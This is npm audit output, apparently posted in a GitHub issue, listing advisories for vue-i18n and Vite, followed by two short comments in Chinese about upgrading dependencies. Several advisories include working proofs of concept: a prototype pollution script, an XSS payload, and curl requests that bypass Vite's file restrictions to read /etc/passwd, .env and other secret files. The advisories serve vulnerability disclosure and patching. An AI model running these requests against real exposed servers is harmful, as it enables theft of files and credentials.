"id": 1102467,
"npm_advisory_id": null,
"overview": "**Vulnerability type:**\nPrototype Pollution\n\n**Vulnerability Location(s):**\n```js\n# v9.1\nnode_modules/@intlify/message-resolver/index.js\n\n# v9.2 or later\nnode_modules/@intlify/vue-i18n-core/index.js\n```\n\n**Description:**\n\nThe latest version of `@intlify/message-resolver (9.1)` and `@intlify/vue-i18n-core (9.2 or later)`, (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) `handleFlatJson`. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.\n\nMoreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.\n\n\n**PoC:**\n\n```bash\n// install the package with the latest version\n~$ npm install @intlify/message-resolver@9.1.10\n// run the script mentioned below \n~$ node poc.js\n//The expected output (if the code still vulnerable) is below. \n// Note that the output may slightly differs from function to another.\nBefore Attack: {}\nAfter Attack: {\"pollutedKey\":123}\n```\n\n```js\n// poc.js\n(async () => {\n const lib = await import('@intlify/message-resolver');\n var someObj = {}\n console.log(\"Before Attack: \", JSON.stringify({}.__proto__));\n try {\n // for multiple functions, uncomment only one for each execution.\n lib.handleFlatJson ({ \"__proto__.pollutedKey\": \"pollutedValue\" })\n } catch (e) { }\n console.log(\"After Attack: \", JSON.stringify({}.__proto__));\n delete Object.prototype.pollutedKey;\n})();\n```",
"reported_by": null,
"title": "Vue I18n Allows Prototype Pollution in `handleFlatJson`",
"metadata": null,
"cves": [
"CVE-2025-27597"
],
"access": "public",
"severity": "high",
"module_name": "@intlify/core-base",
"vulnerable_versions": ">=9.1.0 <9.1.11",
"github_advisory_id": "GHSA-p2ph-7g93-hw3m",
"recommendation": "Upgrade to version 9.1.11 or later",
"patched_versions": ">=9.1.11",
"updated": "2025-03-10T19:17:59.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-1321"
],
"url": "https://github.com/advisories/GHSA-p2ph-7g93-hw3m"
},
"1102471": {
"findings": [
{
"version": "9.1.9",
"paths": [
".>@dcloudio/uni-cli-shared>@intlify/core-base>@intlify/message-resolver"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/intlify/vue-i18n/security/advisories/GHSA-p2ph-7g93-hw3m\n- https://github.com/intlify/vue-i18n/commit/d21e06a7440eed8ada7f522b22fcf830b98d3a53\n- https://github.com/intlify/vue-i18n/commit/fbda9988d3ddd3a1a21740d506d2c183d6b6e36a\n- https://github.com/intlify/vue-i18n/commit/feaf13fcff427f2cb1d5ec8076e639506ba28f9e\n- https://github.com/intlify/vue-i18n/releases/tag/v10.0.6\n- https://github.com/intlify/vue-i18n/releases/tag/v11.1.2\n- https://github.com/intlify/vue-i18n/releases/tag/v9.14.3\n- https://nvd.nist.gov/vuln/detail/CVE-2025-27597\n- https://github.com/intlify/vue-i18n/commit/4bb6eacda7fc2cde5687549afa0efb27ca40862a\n- https://github.com/advisories/GHSA-p2ph-7g93-hw3m",
"created": "2025-03-07T15:58:24.000Z",
"id": 1102471,
"npm_advisory_id": null,
"overview": "**Vulnerability type:**\nPrototype Pollution\n\n**Vulnerability Location(s):**\n```js\n# v9.1\nnode_modules/@intlify/message-resolver/index.js\n\n# v9.2 or later\nnode_modules/@intlify/vue-i18n-core/index.js\n```\n\n**Description:**\n\nThe latest version of `@intlify/message-resolver (9.1)` and `@intlify/vue-i18n-core (9.2 or later)`, (previous versions might also affected), is vulnerable to Prototype Pollution through the entry function(s) `handleFlatJson`. An attacker can supply a payload with Object.prototype setter to introduce or modify properties within the global prototype chain, causing denial of service (DoS) a the minimum consequence.\n\nMoreover, the consequences of this vulnerability can escalate to other injection-based attacks, depending on how the library integrates within the application. For instance, if the polluted property propagates to sensitive Node.js APIs (e.g., exec, eval), it could enable an attacker to execute arbitrary commands within the application's context.\n\n\n**PoC:**\n\n```bash\n// install the package with the latest version\n~$ npm install @intlify/message-resolver@9.1.10\n// run the script mentioned below \n~$ node poc.js\n//The expected output (if the code still vulnerable) is below. \n// Note that the output may slightly differs from function to another.\nBefore Attack: {}\nAfter Attack: {\"pollutedKey\":123}\n```\n\n```js\n// poc.js\n(async () => {\n const lib = await import('@intlify/message-resolver');\n var someObj = {}\n console.log(\"Before Attack: \", JSON.stringify({}.__proto__));\n try {\n // for multiple functions, uncomment only one for each execution.\n lib.handleFlatJson ({ \"__proto__.pollutedKey\": \"pollutedValue\" })\n } catch (e) { }\n console.log(\"After Attack: \", JSON.stringify({}.__proto__));\n delete Object.prototype.pollutedKey;\n})();\n```",
"reported_by": null,
"title": "Vue I18n Allows Prototype Pollution in `handleFlatJson`",
"metadata": null,
"cves": [
"CVE-2025-27597"
],
"access": "public",
"severity": "high",
"module_name": "@intlify/message-resolver",
"vulnerable_versions": ">=9.1.0 <9.1.11",
"github_advisory_id": "GHSA-p2ph-7g93-hw3m",
"recommendation": "Upgrade to version 9.1.11 or later",
"patched_versions": ">=9.1.11",
"updated": "2025-03-10T19:17:59.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-1321"
],
"url": "https://github.com/advisories/GHSA-p2ph-7g93-hw3m"
},
"1103517": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-x574-m823-4x7w\n- https://nvd.nist.gov/vuln/detail/CVE-2025-30208\n- https://github.com/vitejs/vite/commit/315695e9d97cc6cfa7e6d9e0229fb50cdae3d9f4\n- https://github.com/vitejs/vite/commit/80381c38d6f068b12e6e928cd3c616bd1d64803c\n- https://github.com/vitejs/vite/commit/807d7f06d33ab49c48a2a3501da3eea1906c0d41\n- https://github.com/vitejs/vite/commit/92ca12dc79118bf66f2b32ff81ed09e0d0bd07ca\n- https://github.com/vitejs/vite/commit/f234b5744d8b74c95535a7b82cc88ed2144263c1\n- https://github.com/advisories/GHSA-x574-m823-4x7w",
"created": "2025-03-25T14:00:02.000Z",
"id": 1103517,
"npm_advisory_id": null,
"overview": "### Summary\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n`@fs` denies access to files outside of Vite serving allow list. Adding `?raw??` or `?import&raw??` to the URL bypasses this limitation and returns the file content if it exists. This bypass exists because trailing separators such as `?` are removed in several places, but are not accounted for in query string regexes.\n\n### PoC\n```bash\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n\n$ echo \"top secret content\" > /tmp/secret.txt\n\n# expected behaviour\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt\"\n\n <body>\n <h1>403 Restricted</h1>\n <p>The request url "/tmp/secret.txt" is outside of Vite serving allow list.\n\n# security bypassed\n$ curl \"http://localhost:5173/@fs/tmp/secret.txt?import&raw??\"\nexport default \"top secret content\\n\"\n//# sourceMappingURL=data:application/json;base64,eyJ2...\n```",
"reported_by": null,
"title": "Vite bypasses server.fs.deny when using ?raw??",
"metadata": null,
"cves": [
"CVE-2025-30208"
],
"access": "public",
"severity": "moderate",
"module_name": "vite",
"vulnerable_versions": ">=5.0.0 <5.4.15",
"github_advisory_id": "GHSA-x574-m823-4x7w",
"recommendation": "Upgrade to version 5.4.15 or later",
"patched_versions": ">=5.4.15",
"updated": "2025-03-25T14:00:04.000Z",
"cvss": {
"score": 5.3,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
},
"cwe": [
"CWE-200",
"CWE-284"
],
"url": "https://github.com/advisories/GHSA-x574-m823-4x7w"
},
"1103628": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-4r4m-qw57-chr8\n- https://github.com/vitejs/vite/commit/59673137c45ac2bcfad1170d954347c1a17ab949\n- https://nvd.nist.gov/vuln/detail/CVE-2025-31125\n- https://github.com/advisories/GHSA-4r4m-qw57-chr8",
"created": "2025-03-31T17:31:54.000Z",
"id": 1103628,
"npm_advisory_id": null,
"overview": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\nOnly apps explicitly exposing the Vite dev server to the network (using `--host` or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n- base64 encoded content of non-allowed files is exposed using `?inline&import` (originally reported as `?import&?inline=1.wasm?init`)\n- content of non-allowed files is exposed using `?raw?import`\n\n`/@fs/` isn't needed to reproduce the issue for files inside the project root.\n\n### PoC\n\nOriginal report (check details above for simplified cases):\n\nThe ?import&?inline=1.wasm?init ending allows attackers to read arbitrary files and returns the file content if it exists. Base64 decoding needs to be performed twice\n```\n$ npm create vite@latest\n$ cd vite-project/\n$ npm install\n$ npm run dev\n```\n\nExample full URL `http://localhost:5173/@fs/C:/windows/win.ini?import&?inline=1.wasm?init`",
"reported_by": null,
"title": "Vite has a `server.fs.deny` bypassed for `inline` and `raw` with `?import` query",
"metadata": null,
"cves": [
"CVE-2025-31125"
],
"access": "public",
"severity": "moderate",
"module_name": "vite",
"vulnerable_versions": ">=5.0.0 <5.4.16",
"github_advisory_id": "GHSA-4r4m-qw57-chr8",
"recommendation": "Upgrade to version 5.4.16 or later",
"patched_versions": ">=5.4.16",
"updated": "2025-03-31T23:32:55.000Z",
"cvss": {
"score": 5.3,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
},
"cwe": [
"CWE-200",
"CWE-284"
],
"url": "https://github.com/advisories/GHSA-4r4m-qw57-chr8"
},
"1103884": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-356w-63v5-8wf4\n- https://nvd.nist.gov/vuln/detail/CVE-2025-32395\n- https://github.com/vitejs/vite/commit/175a83909f02d3b554452a7bd02b9f340cdfef70\n- https://github.com/advisories/GHSA-356w-63v5-8wf4",
"created": "2025-04-11T14:06:03.000Z",
"id": 1103884,
"npm_advisory_id": null,
"overview": "### Summary\nThe contents of arbitrary files can be returned to the browser if the dev server is running on Node or Bun.\n\n### Impact\nOnly apps with the following conditions are affected.\n\n- explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- running the Vite dev server on runtimes that are not Deno (e.g. Node, Bun)\n\n### Details\n\n[HTTP 1.1 spec (RFC 9112) does not allow `#` in `request-target`](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2). Although an attacker can send such a request. For those requests with an invalid `request-line` (it includes `request-target`), the spec [recommends to reject them with 400 or 301](https://datatracker.ietf.org/doc/html/rfc9112#section-3.2-4). The same can be said for HTTP 2 ([ref1](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-2.4.1), [ref2](https://datatracker.ietf.org/doc/html/rfc9113#section-8.3.1-3), [ref3](https://datatracker.ietf.org/doc/html/rfc9113#section-8.1.1-3)).\n\nOn Node and Bun, those requests are not rejected internally and is passed to the user land. For those requests, the value of [`http.IncomingMessage.url`](https://nodejs.org/docs/latest-v22.x/api/http.html#messageurl) contains `#`. Vite assumed `req.url` won't contain `#` when checking `server.fs.deny`, allowing those kinds of requests to bypass the check.\n\nOn Deno, those requests are not rejected internally and is passed to the user land as well. But for those requests, the value of `http.IncomingMessage.url` did not contain `#`. \n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\nsend request to read `/etc/passwd`\n```\ncurl --request-target /@fs/Users/doggy/Desktop/vite-project/#/../../../../../etc/passwd http://127.0.0.1:5173\n```",
"reported_by": null,
"title": "Vite has an `server.fs.deny` bypass with an invalid `request-target`",
"metadata": null,
"cves": [
"CVE-2025-32395"
],
"access": "public",
"severity": "moderate",
"module_name": "vite",
"vulnerable_versions": ">=5.0.0 <5.4.18",
"github_advisory_id": "GHSA-356w-63v5-8wf4",
"recommendation": "Upgrade to version 5.4.18 or later",
"patched_versions": ">=5.4.18",
"updated": "2025-04-11T14:06:06.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-200"
],
"url": "https://github.com/advisories/GHSA-356w-63v5-8wf4"
},
"1104173": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-859w-5945-r5v3\n- https://github.com/vitejs/vite/commit/c22c43de612eebb6c182dd67850c24e4fab8cacb\n- https://nvd.nist.gov/vuln/detail/CVE-2025-46565\n- https://github.com/advisories/GHSA-859w-5945-r5v3",
"created": "2025-04-30T17:40:27.000Z",
"id": 1104173,
"npm_advisory_id": null,
"overview": "### Summary\nThe contents of files in [the project `root`](https://vite.dev/config/shared-options.html#root) that are denied by a file matching pattern can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\nOnly files that are under [project `root`](https://vite.dev/config/shared-options.html#root) and are denied by a file matching pattern can be bypassed.\n\n- Examples of file matching patterns: `.env`, `.env.*`, `*.{crt,pem}`, `**/.env`\n- Examples of other patterns: `**/.git/**`, `.git/**`, `.git/**/*`\n\n### Details\n[`server.fs.deny`](https://vite.dev/config/server-options.html#server-fs-deny) can contain patterns matching against files (by default it includes `.env`, `.env.*`, `*.{crt,pem}` as such patterns).\nThese patterns were able to bypass for files under `root` by using a combination of slash and dot (`/.`).\n\n### PoC\n```\nnpm create vite@latest\ncd vite-project/\ncat \"secret\" > .env\nnpm install\nnpm run dev\ncurl --request-target /.env/. http://localhost:5173\n```\n\n\n",
"reported_by": null,
"title": "Vite's server.fs.deny bypassed with /. for files under project root",
"metadata": null,
"cves": [
"CVE-2025-46565"
],
"access": "public",
"severity": "moderate",
"module_name": "vite",
"vulnerable_versions": ">=5.0.0 <=5.4.18",
"github_advisory_id": "GHSA-859w-5945-r5v3",
"recommendation": "Upgrade to version 5.4.19 or later",
"patched_versions": ">=5.4.19",
"updated": "2025-05-02T15:33:48.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-22"
],
"url": "https://github.com/advisories/GHSA-859w-5945-r5v3"
},
"1104202": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-xcj6-pq6g-qj4x\n- https://nvd.nist.gov/vuln/detail/CVE-2025-31486\n- https://github.com/vitejs/vite/commit/62d7e81ee189d65899bb65f3263ddbd85247b647\n- https://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290\n- https://github.com/advisories/GHSA-xcj6-pq6g-qj4x",
"created": "2025-04-04T14:20:05.000Z",
"id": 1104202,
"npm_advisory_id": null,
"overview": "### Summary\n\nThe contents of arbitrary files can be returned to the browser.\n\n### Impact\n\nOnly apps explicitly exposing the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host)) are affected.\n\n### Details\n\n#### `.svg`\n\nRequests ending with `.svg` are loaded at this line.\nhttps://github.com/vitejs/vite/blob/037f801075ec35bb6e52145d659f71a23813c48f/packages/vite/src/node/plugins/asset.ts#L285-L290\nBy adding `?.svg` with `?.wasm?init` or with `sec-fetch-dest: script` header, the restriction was able to bypass.\n\nThis bypass is only possible if the file is smaller than [`build.assetsInlineLimit`](https://vite.dev/config/build-options.html#build-assetsinlinelimit) (default: 4kB) and when using Vite 6.0+.\n\n#### relative paths\n\nThe check was applied before the id normalization. This allowed requests to bypass with relative paths (e.g. `../../`).\n\n### PoC\n\n```bash\nnpm create vite@latest\ncd vite-project/\nnpm install\nnpm run dev\n```\n\nsend request to read `etc/passwd`\n\n```bash\ncurl 'http://127.0.0.1:5173/etc/passwd?.svg?.wasm?init'\n```\n\n```bash\ncurl 'http://127.0.0.1:5173/@fs/x/x/x/vite-project/?/../../../../../etc/passwd?import&?raw'\n```",
"reported_by": null,
"title": "Vite allows server.fs.deny to be bypassed with .svg or relative paths",
"metadata": null,
"cves": [
"CVE-2025-31486"
],
"access": "public",
"severity": "moderate",
"module_name": "vite",
"vulnerable_versions": ">=5.0.0 <5.4.17",
"github_advisory_id": "GHSA-xcj6-pq6g-qj4x",
"recommendation": "Upgrade to version 5.4.17 or later",
"patched_versions": ">=5.4.17",
"updated": "2025-04-30T17:26:54.000Z",
"cvss": {
"score": 5.3,
"vectorString": "CVSS:3.1/AV:N/AC:H/PR:N/UI:R/S:U/C:H/I:N/A:N"
},
"cwe": [
"CWE-200",
"CWE-284"
],
"url": "https://github.com/advisories/GHSA-xcj6-pq6g-qj4x"
},
"1106453": {
"findings": [
{
"version": "9.1.9",
"paths": [
".>@dcloudio/uni-cli-shared>@intlify/core-base"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/intlify/vue-i18n/security/advisories/GHSA-x8qp-wqqm-57ph\n- https://nvd.nist.gov/vuln/detail/CVE-2025-53892\n- https://github.com/intlify/vue-i18n/pull/2229\n- https://github.com/intlify/vue-i18n/pull/2230\n- https://github.com/intlify/vue-i18n/commit/49f982443ab8fd94ecc427b265ce97d57df94d7e\n- https://github.com/intlify/vue-i18n/commit/a47099619fb9b256e86341a8658ebe72e92ab099\n- https://github.com/intlify/vue-i18n/releases/tag/v10.0.8\n- https://github.com/intlify/vue-i18n/releases/tag/v11.1.10\n- https://github.com/intlify/vue-i18n/releases/tag/v9.14.5\n- https://github.com/advisories/GHSA-x8qp-wqqm-57ph",
"created": "2025-07-16T19:32:48.000Z",
"id": 1106453,
"npm_advisory_id": null,
"overview": "### Summary\nThe escapeParameterHtml: true option in Vue I18n is designed to protect against HTML/script injection by escaping interpolated parameters. However, this setting fails to prevent execution of certain tag-based payloads, such as `<img src=x onerror=...>`, if the interpolated value is inserted inside an HTML context using v-html.\n\nThis may lead to a DOM-based XSS vulnerability, even when using escapeParameterHtml: true, if a translation string includes minor HTML and is rendered via v-html.\n\n### Details\n\nWhen escapeParameterHtml: true is enabled, it correctly escapes common injection points.\n\nHowever, it does not sanitize entire attribute contexts, which can be used as XSS vectors via:\n\n`<img src=x onerror=alert(1)>\n`\n### PoC\nIn your Vue I18n configuration:\n\n```\nconst i18n = createI18n({\n escapeParameterHtml: true,\n messages: {\n en: {\n vulnerable: 'Caution: <img src=x onerror=\"{payload}\">'\n }\n }\n});\n```\nUse this interpolated payload:\n\n`const payload = '<script>alert(\"xss\")</script>';`\nRender the translation using v-html (even not using v-html):\n\n`<p v-html=\"$t('vulnerable', { payload })\"></p>\n`\nExpected: escaped content should render as text, not execute.\n\nActual: script executes in some environments (or the payload is partially parsed as HTML).\n\n### Impact\n\nThis creates a DOM-based Cross-Site Scripting (XSS) vulnerability despite enabling a security option (escapeParameterHtml) .",
"reported_by": null,
"title": "vue-i18n's escapeParameterHtml does not prevent DOM-based XSS through its tag attributes",
"metadata": null,
"cves": [
"CVE-2025-53892"
],
"access": "public",
"severity": "moderate",
"module_name": "@intlify/core-base",
"vulnerable_versions": ">=9.0.0 <9.14.5",
"github_advisory_id": "GHSA-x8qp-wqqm-57ph",
"recommendation": "Upgrade to version 9.14.5 or later",
"patched_versions": ">=9.14.5",
"updated": "2025-07-17T20:58:50.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-79"
],
"url": "https://github.com/advisories/GHSA-x8qp-wqqm-57ph"
},
"1107323": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-g4jq-h2w9-997c\n- https://nvd.nist.gov/vuln/detail/CVE-2025-58751\n- https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb\n- https://github.com/vitejs/vite/commit/09f2b52e8d5907f26602653caf41b3a56692600d\n- https://github.com/vitejs/vite/commit/4f1c35bcbb5830290c694aa14b6789e07450f069\n- https://github.com/vitejs/vite/commit/63e2a5d232218f3f8d852056751e609a5367aaec\n- https://github.com/vitejs/vite/commit/e11d24008b97d4ca731ecc1a3b95260a6d12e7e0\n- https://github.com/advisories/GHSA-g4jq-h2w9-997c",
"created": "2025-09-09T20:55:56.000Z",
"id": 1107323,
"npm_advisory_id": null,
"overview": "### Summary\nFiles starting with the same name with the public directory were served bypassing the `server.fs` settings.\n\n### Impact\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [`server.host` config option](https://vitejs.dev/config/server-options.html#server-host))\n- uses [the public directory feature](https://vite.dev/guide/assets.html#the-public-directory) (enabled by default)\n- a symlink exists in the public directory\n\n### Details\nThe [servePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L79) function is in charge of serving public files from the server. It returns the [viteServePublicMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L106) function which runs the needed tests and serves the page. The viteServePublicMiddleware function [checks if the publicFiles variable is defined](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L111), and then uses it to determine if the requested page is public. In the case that the publicFiles is undefined, the code will treat the requested page as a public page, and go on with the serving function. [publicFiles may be undefined if there is a symbolic link anywhere inside the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/publicDir.ts#L21). In that case, every requested page will be passed to the public serving function. The serving function is based on the [sirv](https://github.com/lukeed/sirv) library. Vite patches the library to add the possibility to test loading access to pages, but when the public page middleware [disables this functionality](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L89) since public pages are meant to be available always, regardless of whether they are in the allow or deny list.\n\nIn the case of public pages, the serving function is [provided with the path to the public directory](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L85) as a root directory. The code of the sirv library [uses the join function to get the full path to the requested file](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L42). For example, if the public directory is \"/www/public\", and the requested file is \"myfile\", the code will join them to the string \"/www/public/myfile\". The code will then pass this string to the normalize function. Afterwards, the code will [use the string's startsWith function](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L43) to determine whether the created path is within the given directory or not. Only if it is, it will be served.\n\nSince [sirv trims the trailing slash of the public directory](https://github.com/lukeed/sirv/blob/d061616827dd32d53b61ec9530c9445c8f592620/packages/sirv/index.mjs#L119), the string's startsWith function may return true even if the created path is not within the public directory. For example, if the server's root is at \"/www\", and the public directory is at \"/www/p\", if the created path will be \"/www/private.txt\", the startsWith function will still return true, because the string \"/www/private.txt\" starts with \"/www/p\". To achieve this, the attacker will use \"..\" to ask for the file \"../private.txt\". The code will then join it to the \"/www/p\" string, and will receive \"/www/p/../private.txt\". Then, the normalize function will return \"/www/private.txt\", which will then be passed to the startsWith function, which will return true, and the processing of the page will continue without checking the deny list (since this is the public directory middleware which doesn't check that).\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\nmkdir p\ncd p\nln -s a b\ncd ..\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({publicDir: path.resolve(__dirname, \"p/\"), server: {fs: {deny: [path.resolve(__dirname, \"private.txt\")]}}})' > vite.config.js\necho \"secret\" > private.txt\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/private.txt'`\n\nYou will receive a 403 HTTP Response, because private.txt is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../private.txt'`\n\nYou will receive the contents of private.txt.\n\n### Related links\n- https://github.com/lukeed/sirv/commit/f0113f3f8266328d804ee808f763a3c11f8997eb",
"reported_by": null,
"title": "Vite middleware may serve files starting with the same name with the public directory",
"metadata": null,
"cves": [
"CVE-2025-58751"
],
"access": "public",
"severity": "low",
"module_name": "vite",
"vulnerable_versions": "<=5.4.19",
"github_advisory_id": "GHSA-g4jq-h2w9-997c",
"recommendation": "Upgrade to version 5.4.20 or later",
"patched_versions": ">=5.4.20",
"updated": "2025-09-09T20:55:57.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-22",
"CWE-200",
"CWE-284"
],
"url": "https://github.com/advisories/GHSA-g4jq-h2w9-997c"
},
"1107327": {
"findings": [
{
"version": "5.2.8",
"paths": [
".>vite"
]
}
],
"found_by": null,
"deleted": null,
"references": "- https://github.com/vitejs/vite/security/advisories/GHSA-jqfw-vq24-v9c3\n- https://nvd.nist.gov/vuln/detail/CVE-2025-58752\n- https://github.com/vitejs/vite/commit/0ab19ea9fcb66f544328f442cf6e70f7c0528d5f\n- https://github.com/vitejs/vite/commit/14015d794f69accba68798bd0e15135bc51c9c1e\n- https://github.com/vitejs/vite/commit/482000f57f56fe6ff2e905305100cfe03043ddea\n- https://github.com/vitejs/vite/commit/6f01ff4fe072bcfcd4e2a84811772b818cd51fe6\n- https://github.com/vitejs/vite/blob/v7.1.5/packages/vite/CHANGELOG.md\n- https://github.com/advisories/GHSA-jqfw-vq24-v9c3",
"created": "2025-09-09T20:54:42.000Z",
"id": 1107327,
"npm_advisory_id": null,
"overview": "### Summary\nAny HTML files on the machine were served regardless of the `server.fs` settings.\n\n### Impact\n\nOnly apps that match the following conditions are affected:\n\n- explicitly exposes the Vite dev server to the network (using --host or [server.host config option](https://vitejs.dev/config/server-options.html#server-host))\n- `appType: 'spa'` (default) or `appType: 'mpa'` is used\n\nThis vulnerability also affects the preview server. The preview server allowed HTML files not under the output directory to be served.\n\n### Details\nThe [serveStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L123) function is in charge of serving static files from the server. It returns the [viteServeStaticMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L136) function which runs the needed tests and serves the page. The viteServeStaticMiddleware function [checks if the extension of the requested file is \".html\"](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/static.ts#L144). If so, it doesn't serve the page. Instead, the server will go on to the next middlewares, in this case [htmlFallbackMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/htmlFallback.ts#L14), and then to [indexHtmlMiddleware](https://github.com/vitejs/vite/blob/9719497adec4ad5ead21cafa19a324bb1d480194/packages/vite/src/node/server/middlewares/indexHtml.ts#L438). These middlewares don't perform any test against allow or deny rules, and they don't make sure that the accessed file is in the root directory of the server. They just find the file and send back its contents to the client.\n\n### PoC\nExecute the following shell commands:\n\n```\nnpm create vite@latest\ncd vite-project/\necho \"secret\" > /tmp/secret.html\nnpm install\nnpm run dev\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/../../../../../../../../../../../tmp/secret.html'`\n\nThe contents of /tmp/secret.html will be returned.\n\nThis will also work for HTML files that are in the root directory of the project, but are in the deny list (or not in the allow list). Test that by stopping the running server (CTRL+C), and running the following commands in the server's shell:\n\n```\necho 'import path from \"node:path\"; import { defineConfig } from \"vite\"; export default defineConfig({server: {fs: {deny: [path.resolve(__dirname, \"secret_files/*\")]}}})' > [vite.config.js](http://vite.config.js)\nmkdir secret_files\necho \"secret txt\" > secret_files/secret.txt\necho \"secret html\" > secret_files/secret.html\nnpm run dev\n\n```\n\nThen, in a different shell, run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.txt'`\n\nYou will receive a 403 HTTP Response, because everything in the secret_files directory is denied.\n\nNow in the same shell run the following command:\n\n`curl -v --path-as-is 'http://localhost:5173/secret_files/secret.html'`\n\nYou will receive the contents of secret_files/secret.html.",
"reported_by": null,
"title": "Vite's `server.fs` settings were not applied to HTML files",
"metadata": null,
"cves": [
"CVE-2025-58752"
],
"access": "public",
"severity": "low",
"module_name": "vite",
"vulnerable_versions": "<=5.4.19",
"github_advisory_id": "GHSA-jqfw-vq24-v9c3",
"recommendation": "Upgrade to version 5.4.20 or later",
"patched_versions": ">=5.4.20",
"updated": "2025-09-09T20:54:43.000Z",
"cvss": {
"score": 0,
"vectorString": null
},
"cwe": [
"CWE-23",
"CWE-200",
"CWE-284"
],
"url": "https://github.com/advisories/GHSA-jqfw-vq24-v9c3"
}
},
"muted": [],
"metadata": {
"vulnerabilities": {
"info": 0,
"low": 2,
"moderate": 13,
"high": 3,
"critical": 0
},
"dependencies": 795,
"devDependencies": 0,
"optionalDependencies": 0,
"totalDependencies": 795
}
}
chouchouji commented
vite和vue相关依赖后续会考虑升级
ixqbar commented
vite和vue相关依赖后续会考虑升级
不仅仅只有他们,比如: uni-cli-shared